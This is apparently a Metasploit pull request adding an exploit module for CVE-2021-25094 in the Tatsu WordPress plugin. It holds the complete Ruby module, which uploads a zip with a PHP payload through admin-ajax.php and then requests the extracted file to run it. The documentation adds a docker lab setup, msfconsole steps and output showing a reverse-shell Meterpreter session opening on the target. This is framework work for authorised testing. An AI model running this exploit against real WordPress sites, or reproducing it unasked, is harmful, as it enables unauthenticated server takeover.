### PR TITLE
Adds module for Tatsu WP plugin (CVE-2021-25094)

### DIFF
--- a/data/wordlists/wp-exploitable-plugins.txt
+++ b/data/wordlists/wp-exploitable-plugins.txt
@@ -46,6 +46,7 @@ slideshow-gallery
 sp-client-document-manager
 subscribe-to-comments
 suretriggers
+tatsu
 ultimate-member
 user-registration
 user-registration-pro

--- a/documentation/modules/exploit/multi/http/wp_tatsu_rce.md
+++ b/documentation/modules/exploit/multi/http/wp_tatsu_rce.md
@@ -58,7 +58,6 @@ volumes:
 
 ## Scenarios
 
-### Version and OS
 
 Vulnerable version is <= 3.3.11.
 

--- a/documentation/modules/exploit/multi/http/wp_tatsu_rce.md
+++ b/documentation/modules/exploit/multi/http/wp_tatsu_rce.md
@@ -1,0 +1,70 @@
+## Vulnerable Application
+
+This module exploits unauthenticated remote code execution in Tatsu plugin for Wordpress. The vulnerable version is below 3.3.11. The module upload malicious zip file containing PHP payload, which gets parsed and unzipped into Wordpress upload directory. Then module will trigger the payload by sending request with payload directory as URI. The vulnerable plugin is available [here](https://tatsubuilder.com/wp-content/uploads/edd/2022/03/tatsu-3.3.11.zip) 
+
+## Verification Steps
+
+
+1. Install the application
+1.1 Create `docker-compose.yml`
+```yaml
+services:
+
+  wordpress:
+    image: wordpress:6.3.2
+    restart: always
+    ports:
+      - 5555:80
+    environment:
+      WORDPRESS_DB_HOST: db
+      WORDPRESS_DB_USER: ms
+      WORDPRESS_DB_PASSWORD: supersecret
+      WORDPRESS_DB_NAME: proof_of_concept
+    volumes:
+      - wordpress:/var/www/html
+      - ./custom.ini:/usr/local/etc/php/conf.d/custom.ini
+
+  db:
+    image: mysql:5.7
+    restart: always
+    environment:
+      MYSQL_DATABASE: proof_of_concept
+      MYSQL_USER: ms
+      MYSQL_PASSWORD: supersecret
+      MYSQL_ROOT_PASSWORD: supersecret
+    volumes:
+      - db:/var/lib/mysql
+
+volumes:
+  wordpress:
+  db:
+
+```
+1.2 Download [plugin](https://tatsubuilder.com/wp-content/uploads/edd/2022/03/tatsu-3.3.11.zip)
+1.3 Install the plugin in Wordpress admin portal
+
+2. `msfconsole`
+3. `use multi/http/wp_tatsu_rce`
+4. `set RHOST [target IP]`
+5. `set RPORT [target PORT]`
+6. `set LHOST [attacker's IP]`
+7. `set LPORT [attacker's port]`
+
+## Options
+
+
+### Version and OS
+
+```
+`msf6 exploit(multi/http/wp_tatsu_rce) > run
+[*] Started reverse TCP handler on 192.168.168.128:4444 
+[*] Sending stage (40004 bytes) to 172.18.0.2
+[*] Meterpreter session 2 opened (192.168.168.128:4444 -> 172.18.0.2:37718) at 2025-06-11 18:59:35 +0200
+[*] Starting interaction with 2...
+
+meterpreter > sysinfo
+Computer    : ff0d55ec29bf
+OS          : Linux ff0d55ec29bf 6.12.10-76061203-generic #202412060638~1748542656~22.04~663e4dc SMP PREEMPT_DYNAMIC Thu M x86_64
+Meterpreter : php/linux
+meterpreter > 
+```

--- a/documentation/modules/exploit/multi/http/wp_tatsu_rce.md
+++ b/documentation/modules/exploit/multi/http/wp_tatsu_rce.md
@@ -1,9 +1,9 @@
 ## Vulnerable Application
 
-This module exploits unauthenticated remote code execution in Tatsu plugin for Wordpress. The vulnerable version is below 3.3.11. 
-The module upload malicious zip file containing PHP payload, which gets parsed and unzipped into Wordpress upload directory. 
-Then module will trigger the payload by sending request with payload directory as URI. The vulnerable plugin is available [here](https://tatsubuilder.com/wp-content/uploads/edd/2022/03/tatsu-3.3.11.zip) 
-
+This module exploits unauthenticated remote code execution in Tatsu plugin for Wordpress. The vulnerable version is below 3.3.11.
+The module upload malicious zip file containing PHP payload, which gets parsed and unzipped into Wordpress upload directory.
+Then module will trigger the payload by sending request with payload directory as URI.
+The vulnerable plugin is available [here](https://tatsubuilder.com/wp-content/uploads/edd/2022/03/tatsu-3.3.11.zip)
 
 ## Verification Steps
 

--- a/documentation/modules/exploit/multi/http/wp_tatsu_rce.md
+++ b/documentation/modules/exploit/multi/http/wp_tatsu_rce.md
@@ -1,6 +1,9 @@
 ## Vulnerable Application
 
-This module exploits unauthenticated remote code execution in Tatsu plugin for Wordpress. The vulnerable version is below 3.3.11. The module upload malicious zip file containing PHP payload, which gets parsed and unzipped into Wordpress upload directory. Then module will trigger the payload by sending request with payload directory as URI. The vulnerable plugin is available [here](https://tatsubuilder.com/wp-content/uploads/edd/2022/03/tatsu-3.3.11.zip) 
+This module exploits unauthenticated remote code execution in Tatsu plugin for Wordpress. The vulnerable version is below 3.3.11. 
+The module upload malicious zip file containing PHP payload, which gets parsed and unzipped into Wordpress upload directory. 
+Then module will trigger the payload by sending request with payload directory as URI. The vulnerable plugin is available [here](https://tatsubuilder.com/wp-content/uploads/edd/2022/03/tatsu-3.3.11.zip) 
+
 
 ## Verification Steps
 
@@ -53,7 +56,13 @@ volumes:
 ## Options
 
 
+## Scenarios
+
+Vulnerable version is <= 3.3.11.
+
 ### Version and OS
+
+Vulnerable version is <= 3.3.11.
 
 ```
 `msf6 exploit(multi/http/wp_tatsu_rce) > run

--- a/documentation/modules/exploit/multi/http/wp_tatsu_rce.md
+++ b/documentation/modules/exploit/multi/http/wp_tatsu_rce.md
@@ -58,8 +58,6 @@ volumes:
 
 ## Scenarios
 
-Vulnerable version is <= 3.3.11.
-
 ### Version and OS
 
 Vulnerable version is <= 3.3.11.

--- a/modules/exploits/multi/http/wp_tatsu_rce.rb
+++ b/modules/exploits/multi/http/wp_tatsu_rce.rb
@@ -10,7 +10,7 @@ class MetasploitModule < Msf::Exploit::Remote
   include Msf::Exploit::FileDropper
   include Msf::Exploit::Remote::HttpClient
   include Msf::Exploit::Remote::HTTP::Wordpress
-prepend Msf::Exploit::Remote::AutoCheck
+  prepend Msf::Exploit::Remote::AutoCheck
 
   def initialize(info = {})
     super(

--- a/modules/exploits/multi/http/wp_tatsu_rce.rb
+++ b/modules/exploits/multi/http/wp_tatsu_rce.rb
@@ -62,9 +62,6 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def upload_malicious_zip
     zip_payload = create_zip
-    post_data = Rex::MIME::Message.new
-    post_data.add_part('add_custom_font', nil, nil, 'form-data; name="action"')
-    post_data.add_part(zip_payload, nil, nil, %(form-data; name="file"; filename="#{Rex::Text.rand_text_alphanumeric(12)}.zie"))
 
     boundary = Rex::Text.rand_text_alphanumeric(32).to_s
 
@@ -116,13 +113,13 @@ class MetasploitModule < Msf::Exploit::Remote
 
     changelog_body = res.body
 
-    return CheckCode::Detected('Could not find tatsu plugin') if changelog_body.blank?
+    return CheckCode::Safe('Could not find tatsu plugin') if changelog_body.blank?
 
-    return CheckCode::Safe('Failed to get version') unless changelog_body.match(/v(\d\d?.\d\d?.\d\d?)/)
+    return CheckCode::Detected('Tatsu plugin detected but it failed to get version') unless changelog_body.match(/v(\d\d?.\d\d?.\d\d?)/)
 
     version = Rex::Version.new(Regexp.last_match(1))
 
-    return CheckCode::Vulnerable("Found version #{version}") if version <= Rex::Version.new('3.3.11')
+    return CheckCode::Appears("Found version #{version}") if version <= Rex::Version.new('3.3.11')
 
     return CheckCode::Safe('Patched version detected')
   end

--- a/modules/exploits/multi/http/wp_tatsu_rce.rb
+++ b/modules/exploits/multi/http/wp_tatsu_rce.rb
@@ -1,0 +1,135 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Payload::Php
+  include Msf::Exploit::FileDropper
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::Remote::HTTP::Wordpress
+  # prepend Msf::Exploit::Remote::AutoCheck
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Tatsu Wordpress Plugin RCE',
+        'Description' => %q{
+          This module adds exploit for CVE-2021-25094 - unauthenticated remote code execution in Tatsu Wordpress plugin <= 3.3.11. Module uploads malicious zip with PHP payload that gets executed in second part of exploit.
+        },
+        'Author' => [
+          'Vincent Michel', # Vulnerability discovery
+          'msutovsky-r7' # Metasploit module
+        ],
+        'References' => [
+          ['CVE', '2021-25094'],
+          ['EDB', '52260']
+        ],
+        'License' => MSF_LICENSE,
+        'Privileged' => false,
+        'Platform' => %w[php],
+        'Arch' => [ARCH_PHP],
+        'Targets' => [
+          [
+            'PHP',
+            {
+              'Platform' => 'php',
+              'Arch' => ARCH_PHP
+              # tested with php/meterpreter/reverse_tcp
+            }
+          ]
+        ],
+        'DefaultTarget' => 0,
+        'DisclosureDate' => '2022-04-25',
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK],
+          'Reliability' => [REPEATABLE_SESSION]
+        }
+      )
+    )
+  end
+
+  def create_zip
+    zip_file = Rex::Zip::Archive.new
+    @payload_file = '.' + Rex::Text.rand_text_alphanumeric(12) + '.php'
+    zip_file.add_file(@payload_file, payload.encoded)
+    zip_file.pack
+  end
+
+  def upload_malicious_zip
+    zip_payload = create_zip
+    post_data = Rex::MIME::Message.new
+    post_data.add_part('add_custom_font', nil, nil, 'form-data; name="action"')
+    post_data.add_part(zip_payload, nil, nil, %(form-data; name="file"; filename="#{Rex::Text.rand_text_alphanumeric(12)}.zie"))
+
+    boundary = Rex::Text.rand_text_alphanumeric(32).to_s
+
+    data_post = "--#{boundary}\r\n"
+    data_post << "Content-Disposition: form-data; name=\"action\"\r\n\r\n"
+    data_post << "add_custom_font\r\n"
+    data_post << "--#{boundary}\r\n"
+
+    data_post << "Content-Disposition: form-data; name=\"file\"; filename=\"#{Rex::Text.rand_text_alphanumeric(12)}.zip\"\r\n\r\n"
+    data_post << "#{zip_payload}\r\n"
+    data_post << "--#{boundary}--\r\n"
+
+    res = send_request_cgi({
+      'method' => 'POST',
+      'uri' => normalize_uri('wp-admin/admin-ajax.php'),
+      'ctype' => "multipart/form-data; boundary=#{boundary}",
+      'data' => data_post
+    })
+
+    fail_with Failure::Unknown, 'Unexpected response' unless res&.code == 200
+    json_content = res.get_json_document
+
+    fail_with Failure::PayloadFailed, 'Failed to upload payload' unless json_content.fetch('status', nil) == 'success'
+
+    @zip_name = json_content.fetch('name', nil)
+
+    fail_with Failure::UnexpectedReply, 'Cannot get uploaded name' unless @zip_name
+  end
+
+  def trigger_payload
+    send_request_cgi({
+      'method' => 'POST',
+      'uri' => normalize_uri('/wp-content/uploads/typehub/custom/', @zip_name.downcase + '/', @payload_file)
+    })
+  end
+
+  def check
+    return CheckCode::Unknown('Target not responding') unless wordpress_and_online?
+
+    wp_version = wordpress_version
+    print_status("Detected WordPress version: #{wp_version}") if wp_version
+
+    res = send_request_cgi({
+      'method' => 'GET',
+      'uri' => normalize_uri('/wp-content/plugins/tatsu/changelog.md')
+    })
+
+    return CheckCode::Unknown('Could not find tatsu plugin') unless res&.code == 200
+
+    changelog_body = res.body
+
+    return CheckCode::Detected('Could not find tatsu plugin') if changelog_body.blank?
+
+    return CheckCode::Safe('Failed to get version') unless changelog_body.match(/v(\d\d?.\d\d?.\d\d?)/)
+
+    version = Rex::Version.new(Regexp.last_match(1))
+
+    return CheckCode::Vulnerable("Found version #{version}") if version <= Rex::Version.new('3.3.11')
+
+    return CheckCode::Safe('Patched version detected')
+  end
+
+  def exploit
+    upload_malicious_zip
+    trigger_payload
+  end
+
+end

--- a/modules/exploits/multi/http/wp_tatsu_rce.rb
+++ b/modules/exploits/multi/http/wp_tatsu_rce.rb
@@ -10,7 +10,7 @@ class MetasploitModule < Msf::Exploit::Remote
   include Msf::Exploit::FileDropper
   include Msf::Exploit::Remote::HttpClient
   include Msf::Exploit::Remote::HTTP::Wordpress
-  # prepend Msf::Exploit::Remote::AutoCheck
+prepend Msf::Exploit::Remote::AutoCheck
 
   def initialize(info = {})
     super(


### PR DESCRIPTION
This module exploits unauthenticated remote code execution in Tatsu plugin for Wordpress. The vulnerability is present up to version 3.3.11. The module upload malicious zip file containing PHP payload, which gets parsed and unzipped into Wordpress upload directory. Then module will trigger the payload by sending request with payload directory as URI. The vulnerable plugin is available [here](https://tatsubuilder.com/wp-content/uploads/edd/2022/03/tatsu-3.3.11.zip) 

## Verification Steps


1. Install the application
1.1 Create `docker-compose.yml`
```yaml
services:

  wordpress:
    image: wordpress:6.3.2
    restart: always
    ports:
      - 5555:80
    environment:
      WORDPRESS_DB_HOST: db
      WORDPRESS_DB_USER: ms
      WORDPRESS_DB_PASSWORD: supersecret
      WORDPRESS_DB_NAME: proof_of_concept
    volumes:
      - wordpress:/var/www/html
      - ./custom.ini:/usr/local/etc/php/conf.d/custom.ini

  db:
    image: mysql:5.7
    restart: always
    environment:
      MYSQL_DATABASE: proof_of_concept
      MYSQL_USER: ms
      MYSQL_PASSWORD: supersecret
      MYSQL_ROOT_PASSWORD: supersecret
    volumes:
      - db:/var/lib/mysql

volumes:
  wordpress:
  db:

```
1.2 Download [plugin](https://tatsubuilder.com/wp-content/uploads/edd/2022/03/tatsu-3.3.11.zip)
1.3 Install the plugin in Wordpress admin portal

2. `msfconsole`
3. `use multi/http/wp_tatsu_rce`
4. `set RHOST [target IP]`
5. `set RPORT [target PORT]`
6. `set LHOST [attacker's IP]`
7. `set LPORT [attacker's port]`

## Options


### Version and OS

```
`msf6 exploit(multi/http/wp_tatsu_rce) > run
[*] Started reverse TCP handler on 192.168.168.128:4444 
[*] Sending stage (40004 bytes) to 172.18.0.2
[*] Meterpreter session 2 opened (192.168.168.128:4444 -> 172.18.0.2:37718) at 2025-06-11 18:59:35 +0200
[*] Starting interaction with 2...
meterpreter > sysinfo
Computer    : ff0d55ec29bf
OS          : Linux ff0d55ec29bf 6.12.10-76061203-generic #202412060638~1748542656~22.04~663e4dc SMP PREEMPT_DYNAMIC Thu M x86_64
Meterpreter : php/linux
meterpreter > 
```